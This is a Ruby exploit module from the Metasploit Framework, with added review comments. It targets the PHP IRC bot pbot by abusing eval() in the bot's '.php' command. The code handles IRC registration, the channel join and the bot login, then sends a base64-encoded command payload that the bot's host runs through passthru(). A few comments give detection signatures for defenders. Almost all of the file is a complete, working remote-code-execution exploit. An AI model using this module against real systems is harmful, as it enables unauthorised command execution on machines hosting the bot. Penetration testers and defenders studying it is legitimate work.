Path: blob/master/modules/exploits/multi/misc/pbot_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the PHP IRC bot "pbot": the bot's `.php` command hands
# channel-supplied text to eval(), so any user the bot accepts a `.login` from
# can run arbitrary PHP (and, through passthru(), OS commands) on the host
# running the bot. The whole interaction is plain IRC traffic, which makes it
# straightforward to spot in IRC server logs or with a network IDS (see the
# note on pbot_command below).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Supplies connect/disconnect, `sock`, and the RHOST/RPORT options used below.
  include Msf::Exploit::Remote::Tcp

  # Module metadata and user-configurable options.
  #
  # Options registered here:
  #   RPORT         - IRC server port (default 6667).
  #   IRC_PASSWORD  - optional server password, sent as PASS during registration.
  #   NICK          - nickname to register with (replaced if longer than 9 chars,
  #                   see #register).
  #   CHANNEL       - channel where the bot is listening.
  #   PBOT_PASSWORD - optional password appended to the bot's `.login` command.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP IRC Bot pbot eval() Remote Code Execution',
      'Description'    => %q{
        This module allows remote command execution on the PHP IRC bot pbot by abusing
        the usage of eval() in the implementation of the .php command. In order to work,
        the data to connect to the IRC server and channel where find pbot must be provided.
        The module has been successfully tested on the version of pbot analyzed by Jay
        Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP
        SP3.
      },
      'Author'         =>
        [
          'evilcry', # pbot analysis
          'Jay Turla', # pbot analysis
          'bwall', # aka @bwallHatesTwits, PoC
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '84913' ],
          [ 'EDB', '20168' ],
          [ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/']
        ],
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          # The payload travels inside a single PRIVMSG line; the budget below
          # leaves room for the "PRIVMSG <channel> :.php ..." framing within the
          # 512-byte IRC line limit.
          'Space'       => 344, # According to RFC 2812, the max length message is 512, including the cr-lf
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
            }
        },
      'Targets'        =>
        [
          [ 'pbot', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2009-11-02',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']),
        OptString.new('PBOT_PASSWORD', [false, 'pbot Password', ''])
      ])
  end

  # Framework hook. NOTE(review): presumably tells the framework this module
  # operates with supplied credentials (IRC_PASSWORD / PBOT_PASSWORD) — confirm
  # against the Msf::Exploit API before relying on it.
  def post_auth?
    true
  end

  # Vulnerability check: performs the same IRC handshake as #exploit, sends the
  # bot's `.login` command, and classifies the host from the bot's reply.
  #
  # @return [Exploit::CheckCode] Unknown when IRC registration or the channel
  #   join is refused; Vulnerable when the login reply contains both "auth" and
  #   "logged in"; Safe otherwise.
  #
  # NOTE(review): every match below is an unanchored substring search over the
  # whole buffered reply (see #send_msg), so a MOTD line, nick or channel name
  # that happens to contain "463"/"464"/"353"/"366" would also satisfy it. The
  # numerics are RFC 2812 replies: 463 ERR_NOPERMFORHOST, 464 ERR_PASSWDMISMATCH,
  # 353 RPL_NAMREPLY, 366 RPL_ENDOFNAMES.
  def check
    connect

    response = register(sock)
    if response =~ /463/ or response =~ /464/
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    response = join(sock)
    # Neither RPL_NAMREPLY nor RPL_ENDOFNAMES seen: assume the join failed.
    if not response =~ /353/ and not response =~ /366/
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end
    response = pbot_login(sock)
    # The session is torn down before the reply is classified; nothing below
    # touches the socket.
    quit(sock)
    disconnect

    if response =~ /auth/ and response =~ /logged in/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Writes `data` to the socket, then drains whatever the peer sends back.
  #
  # Reads are issued with a 1-second timeout and repeated until a read returns
  # nil (timeout) or the peer closes the connection (EOFError, swallowed on
  # purpose so that whatever was collected is still returned).
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @param data [String] raw IRC line(s) to send, CRLF included
  # @return [String] everything read back; possibly empty
  def send_msg(sock, data)
    sock.put(data)
    # The parameter is reused as the receive buffer; the request text is no
    # longer needed once it has been written.
    data = ""
    begin
      read_data = sock.get_once(-1, 1)
      while not read_data.nil?
        data << read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue EOFError
    end
    data
  end

  # IRC connection registration: optional PASS, then NICK and USER, sent as one
  # write. Returns the server's response (numerics, MOTD, errors) as raw text.
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @return [String] raw server reply
  def register(sock)
    msg = ""

    # PASS is only emitted when IRC_PASSWORD is set and non-empty.
    if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end

    # RFC 2812 caps nicknames at 9 characters; an over-long NICK is replaced by
    # a random 9-letter one rather than truncated. NOTE(review): this is a
    # substitution, not a failure, so print_warning would fit the message
    # better than print_error.
    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end

    msg << "NICK #{nick}\r\n"
    # USER <user> <local address> <server> :<realname>; the nick is reused for
    # all three name fields.
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    response = send_msg(sock,msg)
    return response
  end

  # Joins CHANNEL and returns the raw server reply (expected to contain
  # RPL_NAMREPLY / RPL_ENDOFNAMES on success).
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @return [String] raw server reply
  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    response = send_msg(sock, join_msg)
    return response
  end

  # Sends the bot's `.login` command to the channel as a PRIVMSG, appending
  # PBOT_PASSWORD when one is configured, and returns the raw reply.
  #
  # The callers treat a reply containing both "auth" and "logged in" as a
  # successful login.
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @return [String] raw reply, expected to carry the bot's login message
  def pbot_login(sock)
    login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login"
    if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty?
      login_msg << " #{datastore['PBOT_PASSWORD']}"
    end
    login_msg << "\r\n"
    response = send_msg(sock, login_msg)
    return response
  end

  # Delivers the payload through the bot's `.php` command. The command payload is
  # base64-encoded so that it contains no IRC-significant characters and is
  # decoded by PHP on the bot side before passthru() runs it.
  #
  # Detection note: the resulting channel message — `.php <letter>
  # passthru(base64_decode("..."))` — is a high-signal indicator in IRC server
  # logs or network captures; pbot's `.php` command accepting PHP source from
  # channel users is the underlying weakness.
  #
  # @param sock [Rex::Socket] connected IRC socket
  # @return [String] raw reply; #exploit discards it
  def pbot_command(sock)
    encoded = Rex::Text.encode_base64(payload.encoded)
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n"
    response = send_msg(sock, command_msg)
    return response
  end

  # Sends QUIT without waiting for a reply; the socket itself is closed by the
  # caller via disconnect.
  #
  # @param sock [Rex::Socket] connected IRC socket
  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  # Exploit flow: IRC registration -> channel join -> pbot login -> `.php`
  # command -> QUIT. Each stage aborts (with a print_error) on the same reply
  # checks that #check uses, except that the login stage requires BOTH "auth"
  # and "logged in" to be present to continue.
  #
  # NOTE(review): the reply from pbot_command is discarded, so this method
  # cannot report whether the bot actually executed the command; the early
  # `return`s also skip quit/disconnect, leaving the connection to the mixin's
  # cleanup.
  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    response = register(sock)
    if response =~ /463/ or response =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    response = join(sock)
    if not response =~ /353/ and not response =~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Registering with the pbot...")
    response = pbot_login(sock)
    if not response =~ /auth/ or not response =~ /logged in/
      print_error("#{rhost}:#{rport} - Error registering with the pbot")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the pbot...")
    pbot_command(sock)

    quit(sock)
    disconnect
  end
end